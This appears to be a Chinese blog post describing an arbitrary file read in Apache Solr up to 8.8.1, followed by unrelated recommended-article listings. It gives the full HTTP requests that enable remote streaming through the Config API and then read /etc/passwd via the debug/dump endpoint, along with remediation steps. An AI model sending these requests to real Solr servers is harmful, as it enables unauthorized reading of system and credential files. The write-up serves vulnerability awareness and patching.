ApacheSolr任意文件读取

作者：行者师兄2502861743 | 来源：互联网 | 2023-06-10 13:15

简介Solr是ApacheLucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成，以及富文本（如Word

简介

Solr是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成&＃xff0c;以及富文本&＃xff08;如Word、PDF&＃xff09;的处理。Solr是高度可扩展的&＃xff0c;并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎&＃xff0c;Solr 4还增加了NoSQL支持。
Solr是用Java编写、运行在Servlet容器&＃xff08;如Apache Tomcat或Jetty&＃xff09;的一个独立的全文搜索服务器。 Solr采用了Lucene Java搜索库为核心的全文索引和搜索&＃xff0c;并具有类似REST的HTTP/XML和JSON的API。 Solr强大的外部配置功能使得无需进行Java编码&＃xff0c;便可对其进行调整以适应多种类型的应用程序。Solr有一个插件架构&＃xff0c;以支持更多的高级定制。

影响范围

Apache Solr <&＃61; 8.8.1

漏洞详情

1、访问solr后台
在这里插入图片描述

2、获取core中的name
http://example.com/solr/admin/cores?indexInfo&＃61;false&wt&＃61;json
在这里插入图片描述

3、判断漏洞是否存在
数据包&＃xff1a;

POST /solr/new_core/config HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,image/avif,image/webp,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 80{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

在这里插入图片描述
发送数据包&＃xff0c;并根据返回信息判断漏洞是否存在。若返回状态码为200且含有&＃xff1a; “WARNING”:“This response format is experimental. It is likely to change in the future.”&＃xff0c;则可以判断漏洞可能存在

4、漏洞利用
利用漏洞读取文件
数据包&＃xff1a;

POST /solr/new_core/debug/dump?param&＃61;ContentStreams HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,image/avif,image/webp,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29stream.url&＃61;file:///etc/passwd

在这里插入图片描述

http://example.com/solr/new_core/debug/dump?param&＃61;ContentStreams&stream.url&＃61;file:///etc/passwd

在这里插入图片描述

修复方式

1、控制solr访问权限&＃xff0c;增加访问口令
2、不对外网开放solr
3、关闭ConfigAPI&＃xff1a;在bin目录下的solr.in.cmd中加入一行set SOLR_OPTS&＃61;%SOLR_OPTS% -Ddisable.configEdit&＃61;true&＃xff1b;然后关闭远程读取文件流&＃xff0c;默认不开启

推荐阅读

client
Web学习历程记录（七）——Tomcat基本概念和配置

本文介绍了Web学习历程记录中关于Tomcat的基本概念和配置。首先解释了Web静态Web资源和动态Web资源的概念，以及C/S架构和B/S架构的区别。然后介绍了常见的Web服务器，包括Weblogic、WebSphere和Tomcat。接着详细讲解了Tomcat的虚拟主机、web应用和虚拟路径映射的概念和配置过程。最后简要介绍了http协议的作用。本文内容详实，适合初学者了解Tomcat的基础知识。 ... [详细]

蜡笔小新 2023-12-13 17:08:24
web
Solr简介（1）

一：什么是solrSolr是apache下的一个开源项目，使用Java基于lucene开发的全文搜索服务器；Lucene是一个开放源代 ... [详细]

蜡笔小新 2023-10-12 18:15:48
web
【译】发送表单数据

这是原文链接：sendingformdata许多情况下，我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单，但是 ... [详细]

蜡笔小新 2023-12-14 16:19:10
web
高校天文共享平台开发过程中的思考与规划

本文介绍了高校天文共享平台的开发过程中的思考和规划。该平台旨在为高校学生提供天象预报、科普知识、观测活动、图片分享等功能。文章分析了项目的技术栈选择、网站前端布局、业务流程、数据库结构等方面，并总结了项目存在的问题，如前后端未分离、代码混乱等。作者表示希望通过记录和规划，能够理清思路，进一步完善该平台。 ... [详细]

蜡笔小新 2023-12-13 18:08:58
web
Linux下部署Symfoy2对app/cache和app/logs目录的权限设置，symfoy2logs

php教程|php手册xml文件php教程-php手册Linux下部署Symfoy2对appcache和applogs目录的权限设置，symfoy2logs黑色记事本源码,vsco ... [详细]

蜡笔小新 2023-10-17 20:32:59
io
Hyperledger Fabric外部链码构建与运行的开发笔记

本文介绍了Hyperledger Fabric外部链码构建与运行的相关知识，包括在Hyperledger Fabric 2.0版本之前链码构建和运行的困难性，外部构建模式的实现原理以及外部构建和运行API的使用方法。通过本文的介绍，读者可以了解到如何利用外部构建和运行的方式来实现链码的构建和运行，并且不再受限于特定的语言和部署环境。 ... [详细]

蜡笔小新 2023-12-13 21:47:39
text
Voicewo在线语音识别转换jQuery插件的特点和示例

本文介绍了一款名为Voicewo的在线语音识别转换jQuery插件，该插件具有快速、架构、风格、扩展和兼容等特点，适合在互联网应用中使用。同时还提供了一个快速示例供开发人员参考。 ... [详细]

蜡笔小新 2023-12-13 20:01:16
web
如何在服务器主机上实现文件共享的方法和工具

本文介绍了在服务器主机上实现文件共享的方法和工具，包括Linux主机和Windows主机的文件传输方式，Web运维和FTP/SFTP客户端运维两种方式，以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外，还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK，以及主机迁移服务会收集的源端服务器信息。 ... [详细]

蜡笔小新 2023-12-13 13:23:48
jar
flowable工作流流程变量_信也科技工作流平台的技术实践

1背景随着公司业务发展及内部业务流程诉求的增长,目前信息化系统不能够很好满足期望,主要体现如下：目前OA流程引擎无法满足企业特定业务流程需求，且移动端体 ... [详细]

蜡笔小新 2023-12-13 10:17:15
io
淘淘商城项目总结及架构介绍

本文总结了淘淘商城项目的功能和架构，并介绍了传统架构中遇到的session共享问题及解决方法。淘淘商城是一个综合性的B2C平台，类似京东商城、天猫商城，会员可以在商城浏览商品、下订单，管理员、运营可以在平台后台管理系统中管理商品、订单、会员等。商城的架构包括后台管理系统、前台系统、会员系统、订单系统、搜索系统和单点登录系统。在传统架构中，可以采用tomcat集群解决并发量高的问题，但由于session共享的限制，集群数量有限。本文探讨了如何解决session共享的问题。 ... [详细]

蜡笔小新 2023-12-12 13:39:39
web
面试经验分享：华为面试四轮电话面试、一轮笔试、一轮主管视频面试、一轮hr视频面试

最近有朋友去华为面试，面试经历包括四轮电话面试、一轮笔试、一轮主管视频面试、一轮hr视频面试。80%的人都在第一轮电话面试中失败，因为缺乏基础知识。面试问题涉及 ... [详细]

蜡笔小新 2023-12-09 10:22:03
client
camel_使用Camel在来自不同来源的Solr中索引数据

camelApacheSolr是建立在Lucene之上的“流行的，快速的开源企业搜索平台”。为了进行搜索(并查找结果)，通常需要从不同的源(例如内容管理 ... [详细]

蜡笔小新 2023-10-15 11:20:39
io
Elasticsearch基础概念之基本原理

ES基本原理名词解释In-memorybuffer:ES内存缓冲区，新建的document写入的地方document：索引和搜索的 ... [详细]

蜡笔小新 2023-10-12 17:10:17
web
Nexus3.0.0+Maven的使用(一)

1、Nexus介绍Nexus是一个强大的Maven仓库管理器，它极大地简化了自己内部仓库的维护和外部仓库的访问。利用Nexus你可以只在一个地方就能够完全控制访问和部署在你所维护仓 ... [详细]

蜡笔小新 2023-10-12 12:41:14
web
mysql+全文检索设计,基于sphinx+mysql全文检索架构设计.doc

基于sphinxmysql全文检索架构设计.doc还剩2页未读，继续阅读下载文档到电脑，马上远离加班熬夜！亲，喜欢就下载吧& ... [详细]

蜡笔小新 2023-10-12 12:34:51

行者师兄2502861743

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章